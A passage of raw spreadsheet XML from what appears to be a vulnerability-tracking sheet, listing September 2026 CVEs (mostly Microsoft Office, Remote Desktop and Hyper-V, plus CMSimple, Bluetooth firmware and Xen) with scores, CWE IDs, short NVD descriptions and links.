t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B231" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C231" s="5" t="inlineStr"><is><t>CVE-2026-78507</t></is></c><c r="D231" s="5" t="n"><v>8.800000000000001</v></c><c r="E231" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F231" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G231" s="5" t="inlineStr" /><c r="H231" s="5" t="n"><v>0.006</v></c><c r="I231" s="5" t="inlineStr" /><c r="J231" s="5" t="inlineStr" /><c r="K231" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L231" s="5" t="inlineStr" /><c r="M231" s="5" t="inlineStr" /><c r="N231" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O231" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P231" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q231" s="5" t="inlineStr" /><c r="R231" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S231" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T231" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78507</t></is></c></row><row r="232"><c r="A232" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B232" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C232" s="5" t="inlineStr"><is><t>CVE-2026-78511</t></is></c><c r="D232" s="5" t="n"><v>8.800000000000001</v></c><c r="E232" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F232" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G232" s="5" t="inlineStr" /><c r="H232" s="5" t="n"><v>0.008</v></c><c r="I232" s="5" t="inlineStr" /><c r="J232" s="5" t="inlineStr" /><c r="K232" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L232" s="5" t="inlineStr" /><c r="M232" s="5" t="inlineStr" /><c r="N232" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O232" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P232" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q232" s="5" t="inlineStr" /><c r="R232" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S232" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T232" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78511</t></is></c></row><row r="233"><c r="A233" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B233" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C233" s="5" t="inlineStr"><is><t>CVE-2026-78512</t></is></c><c r="D233" s="5" t="n"><v>8.800000000000001</v></c><c r="E233" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F233" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G233" s="5" t="inlineStr" /><c r="H233" s="5" t="n"><v>0.008</v></c><c r="I233" s="5" t="inlineStr" /><c r="J233" s="5" t="inlineStr" /><c r="K233" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L233" s="5" t="inlineStr" /><c r="M233" s="5" t="inlineStr" /><c r="N233" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O233" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P233" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q233" s="5" t="inlineStr" /><c r="R233" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="S233" s="5" t="inlineStr"><is><t>Numeric truncation error in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T233" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78512</t></is></c></row><row r="234"><c r="A234" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B234" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C234" s="5" t="inlineStr"><is><t>CVE-2026-78514</t></is></c><c r="D234" s="5" t="n"><v>8.800000000000001</v></c><c r="E234" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F234" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G234" s="5" t="inlineStr" /><c r="H234" s="5" t="n"><v>0.006</v></c><c r="I234" s="5" t="inlineStr" /><c r="J234" s="5" t="inlineStr" /><c r="K234" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L234" s="5" t="inlineStr" /><c r="M234" s="5" t="inlineStr" /><c r="N234" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O234" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P234" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q234" s="5" t="inlineStr" /><c r="R234" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S234" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T234" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78514</t></is></c></row><row r="235"><c r="A235" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B235" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C235" s="5" t="inlineStr"><is><t>CVE-2026-78517</t></is></c><c r="D235" s="5" t="n"><v>8.800000000000001</v></c><c r="E235" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F235" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G235" s="5" t="inlineStr" /><c r="H235" s="5" t="n"><v>0.006</v></c><c r="I235" s="5" t="inlineStr" /><c r="J235" s="5" t="inlineStr" /><c r="K235" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L235" s="5" t="inlineStr" /><c r="M235" s="5" t="inlineStr" /><c r="N235" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O235" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P235" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q235" s="5" t="inlineStr" /><c r="R235" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S235" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T235" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78517</t></is></c></row><row r="236"><c r="A236" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B236" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C236" s="5" t="inlineStr"><is><t>CVE-2026-78518</t></is></c><c r="D236" s="5" t="n"><v>8.800000000000001</v></c><c r="E236" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F236" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G236" s="5" t="inlineStr" /><c r="H236" s="5" t="n"><v>0.008999999999999999</v></c><c r="I236" s="5" t="inlineStr" /><c r="J236" s="5" t="inlineStr" /><c r="K236" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L236" s="5" t="inlineStr" /><c r="M236" s="5" t="inlineStr" /><c r="N236" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O236" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P236" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q236" s="5" t="inlineStr" /><c r="R236" s="5" t="inlineStr"><is><t>CWE-125, CWE-20</t></is></c><c r="S236" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T236" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78518</t></is></c></row><row r="237"><c r="A237" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B237" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C237" s="5" t="inlineStr"><is><t>CVE-2026-78519</t></is></c><c r="D237" s="5" t="n"><v>8.800000000000001</v></c><c r="E237" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F237" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G237" s="5" t="inlineStr" /><c r="H237" s="5" t="n"><v>0.006</v></c><c r="I237" s="5" t="inlineStr" /><c r="J237" s="5" t="inlineStr" /><c r="K237" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t></is></c><c r="L237" s="5" t="inlineStr" /><c r="M237" s="5" t="inlineStr" /><c r="N237" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O237" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P237" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q237" s="5" t="inlineStr" /><c r="R237" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S237" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T237" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78519</t></is></c></row><row r="238"><c r="A238" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B238" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C238" s="5" t="inlineStr"><is><t>CVE-2026-78521</t></is></c><c r="D238" s="5" t="n"><v>8.800000000000001</v></c><c r="E238" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F238" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G238" s="5" t="inlineStr" /><c r="H238" s="5" t="n"><v>0.006</v></c><c r="I238" s="5" t="inlineStr" /><c r="J238" s="5" t="inlineStr" /><c r="K238" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L238" s="5" t="inlineStr" /><c r="M238" s="5" t="inlineStr" /><c r="N238" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O238" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P238" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q238" s="5" t="inlineStr" /><c r="R238" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S238" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T238" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78521</t></is></c></row><row r="239"><c r="A239" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B239" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C239" s="5" t="inlineStr"><is><t>CVE-2026-78524</t></is></c><c r="D239" s="5" t="n"><v>8.800000000000001</v></c><c r="E239" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F239" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G239" s="5" t="inlineStr" /><c r="H239" s="5" t="n"><v>0.008</v></c><c r="I239" s="5" t="inlineStr" /><c r="J239" s="5" t="inlineStr" /><c r="K239" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L239" s="5" t="inlineStr" /><c r="M239" s="5" t="inlineStr" /><c r="N239" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O239" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P239" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q239" s="5" t="inlineStr" /><c r="R239" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S239" s="5" t="inlineStr"><is><t>Out-of-bounds write in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T239" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78524</t></is></c></row><row r="240"><c r="A240" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B240" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C240" s="5" t="inlineStr"><is><t>CVE-2026-78525</t></is></c><c r="D240" s="5" t="n"><v>8.800000000000001</v></c><c r="E240" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F240" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G240" s="5" t="inlineStr" /><c r="H240" s="5" t="n"><v>0.008</v></c><c r="I240" s="5" t="inlineStr" /><c r="J240" s="5" t="inlineStr" /><c r="K240" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L240" s="5" t="inlineStr" /><c r="M240" s="5" t="inlineStr" /><c r="N240" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O240" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P240" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q240" s="5" t="inlineStr" /><c r="R240" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S240" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T240" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78525</t></is></c></row><row r="241"><c r="A241" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B241" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C241" s="5" t="inlineStr"><is><t>CVE-2026-78526</t></is></c><c r="D241" s="5" t="n"><v>8.800000000000001</v></c><c r="E241" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F241" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G241" s="5" t="inlineStr" /><c r="H241" s="5" t="n"><v>0.006</v></c><c r="I241" s="5" t="inlineStr" /><c r="J241" s="5" t="inlineStr" /><c r="K241" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L241" s="5" t="inlineStr" /><c r="M241" s="5" t="inlineStr" /><c r="N241" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O241" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P241" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q241" s="5" t="inlineStr" /><c r="R241" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S241" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T241" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78526</t></is></c></row><row r="242"><c r="A242" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B242" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C242" s="5" t="inlineStr"><is><t>CVE-2026-78834</t></is></c><c r="D242" s="5" t="n"><v>8.800000000000001</v></c><c r="E242" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F242" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G242" s="5" t="inlineStr" /><c r="H242" s="5" t="n"><v>0.005</v></c><c r="I242" s="5" t="inlineStr" /><c r="J242" s="5" t="inlineStr" /><c r="K242" s="5" t="inlineStr" /><c r="L242" s="5" t="inlineStr" /><c r="M242" s="5" t="inlineStr" /><c r="N242" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O242" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P242" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q242" s="5" t="inlineStr" /><c r="R242" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S242" s="5" t="inlineStr"><is><t>A code execution vulnerability exists in CMSimple 5.22 in the CoAuthors plugin. An authenticated low-privileged user who can modify page content and provide controlled imported content can trigger server-side execution by referencing crafted external or uploaded text content through the affected content import feature.</t></is></c><c r="T242" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78834</t></is></c></row><row r="243"><c r="A243" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B243" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C243" s="5" t="inlineStr"><is><t>CVE-2026-79376</t></is></c><c r="D243" s="5" t="n"><v>8.800000000000001</v></c><c r="E243" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F243" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G243" s="5" t="inlineStr" /><c r="H243" s="5" t="n"><v>0.002</v></c><c r="I243" s="5" t="inlineStr" /><c r="J243" s="5" t="inlineStr" /><c r="K243" s="5" t="inlineStr" /><c r="L243" s="5" t="inlineStr" /><c r="M243" s="5" t="inlineStr" /><c r="N243" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O243" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P243" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q243" s="5" t="inlineStr" /><c r="R243" s="5" t="inlineStr"><is><t>CWE-1284, CWE-20</t></is></c><c r="S243" s="5" t="inlineStr"><is><t>An issue in the l2cap_handle_data() function of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t></is></c><c r="T243" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79376</t></is></c></row><row r="244"><c r="A244" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B244" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C244" s="5" t="inlineStr"><is><t>CVE-2026-79602</t></is></c><c r="D244" s="5" t="n"><v>8.800000000000001</v></c><c r="E244" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F244" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G244" s="5" t="inlineStr" /><c r="H244" s="5" t="n"><v>0.001</v></c><c r="I244" s="5" t="inlineStr" /><c r="J244" s="5" t="inlineStr" /><c r="K244" s="5" t="inlineStr" /><c r="L244" s="5" t="inlineStr" /><c r="M244" s="5" t="inlineStr" /><c r="N244" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O244" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P244" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q244" s="5" t="inlineStr" /><c r="R244" s="5" t="inlineStr"><is><t>CWE-119</t></is></c><c r="S244" s="5" t="inlineStr"><is><t>A guest with a PCI device assigned that has at least a BAR on the IO port
space can trigger a BUG() in Xen.</t></is></c><c r="T244" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79602</t></is></c></row><row r="245"><c r="A245" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B245" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C245" s="5" t="inlineStr"><is><t>CVE-2026-80074</t></is></c><c r="D245" s="5" t="n"><v>8.800000000000001</v></c><c r="E245" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F245" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G245" s="5" t="inlineStr" /><c r="H245" s="5" t="n"><v>0.006</v></c><c r="I245" s="5" t="inlineStr" /><c r="J245" s="5" t="inlineStr" /><c r="K245" s="5" t="inlineStr" /><c r="L245" s="5" t="inlineStr" /><c r="M245" s="5" t="inlineStr" /><c r="N245" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O245" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P245" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q245" s="5" t="inlineStr" /><c r="R245" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S245" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T245" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80074</t></is></c></row><row r="246"><c r="A246" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B246" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C246" s="5" t="inlineStr"><is><t>CVE-2026-80077</t></is></c><c r="D246" s="5" t="n"><v>8.800000000000001</v></c><c r="E246" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F246" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G246" s="5" t="inlineStr" /><c r="H246" s="5" t="n"><v>0.006</v></c><c r="I246" s="5" t="inlineStr" /><c r="J246" s="5" t="inlineStr" /><c r="K246" s="5" t="inlineStr" /><c r="L246" s="5" t="inlineStr" /><c r="M246" s="5" t="inlineStr" /><c r="N246" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O246" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P246" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q246" s="5" t="inlineStr" /><c r="R246" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S246" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T246" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80077</t></is></c></row><row r="247"><c r="A247" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B247" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C247" s="5" t="inlineStr"><is><t>CVE-2026-80080</t></is></c><c r="D247" s="5" t="n"><v>8.800000000000001</v></c><c r="E247" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F247" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G247" s="5" t="inlineStr" /><c r="H247" s="5" t="n"><v>0.006</v></c><c r="I247" s="5" t="inlineStr" /><c r="J247" s="5" t="inlineStr" /><c r="K247" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L247" s="5" t="inlineStr" /><c r="M247" s="5" t="inlineStr" /><c r="N247" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O247" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P247" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q247" s="5" t="inlineStr" /><c r="R247" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S247" s="5" t="inlineStr"><is><t>Double free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T247" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80080</t></is></c></row><row r="248"><c r="A248" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B248" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C248" s="5" t="inlineStr"><is><t>CVE-2026-80081</t></is></c><c r="D248" s="5" t="n"><v>8.800000000000001</v></c><c r="E248" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F248" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G248" s="5" t="inlineStr" /><c r="H248" s="5" t="n"><v>0.005</v></c><c r="I248" s="5" t="inlineStr" /><c r="J248" s="5" t="inlineStr" /><c r="K248" s="5" t="inlineStr"><is><t>microsoft:365_apps</t></is></c><c r="L248" s="5" t="inlineStr" /><c r="M248" s="5" t="inlineStr" /><c r="N248" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O248" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P248" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q248" s="5" t="inlineStr" /><c r="R248" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S248" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T248" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80081</t></is></c></row><row r="249"><c r="A249" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B249" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C249" s="5" t="inlineStr"><is><t>CVE-2026-80083</t></is></c><c r="D249" s="5" t="n"><v>8.800000000000001</v></c><c r="E249" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F249" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G249" s="5" t="inlineStr" /><c r="H249" s="5" t="n"><v>0.002</v></c><c r="I249" s="5" t="inlineStr" /><c r="J249" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K249" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L249" s="5" t="inlineStr" /><c r="M249" s="5" t="inlineStr" /><c r="N249" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O249" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P249" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q249" s="5" t="inlineStr" /><c r="R249" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S249" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Hyper-V allows an authorized attacker to execute code locally.</t></is></c><c r="T249" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80083</t></is></c></row><row r="250"><c r="A250" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B250" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C250" s="5" t="inlineStr"><is><t>CVE-2026-80085</t></is></c><c r="D250" s="5" t="n"><v>8.800000000000001</v></c><c r="E250" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F250" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G250" s="5" t="inlineStr" /><c r="H250" s="5" t="n"><v>0.005</v></c><c r="I250" s="5" t="inlineStr" /><c r="J250" s="5" t="inlineStr" /><c r="K250" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L250" s="5" t="inlineStr" /><c r="M250" s="5" t="inlineStr" /><c r="N250" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O250" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P250" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q250" s="5" t="inlineStr" /><c r="R250" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S250" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T250" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80085</t></is></c></row><row r="251"><c r="A251" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B251" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C251" s="5" t="inlineStr"><is><t>CVE-2026-80096</t></is></c><c r="D251" s="5" t="n"><v>8.800000000000001</v></c><c r="E251" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F251" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G251" s="5" t="inlineStr" /><c r="H251" s="5" t="n"><v>0.007</v></c><c r="I251" s="5" t="inlineStr" /><c r="J251" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K25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51" s="5" t="inlineStr" /><c r="M251" s="5" t="inlineStr" /><c r="N251" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O251" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P251" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q251" s="5" t="inlineStr" /><c r="R251" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S251" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Remote Desktop Services allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T251" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80096</t></is></c></row><row r="252"><c r="A252" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B252" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C252" s="5" t="inlineStr"><is><t>CVE-2026-81352</t></is></c><c r="D252" s="5" t="n"><v>8.800000000000001</v></c><c r="E252" s="5" 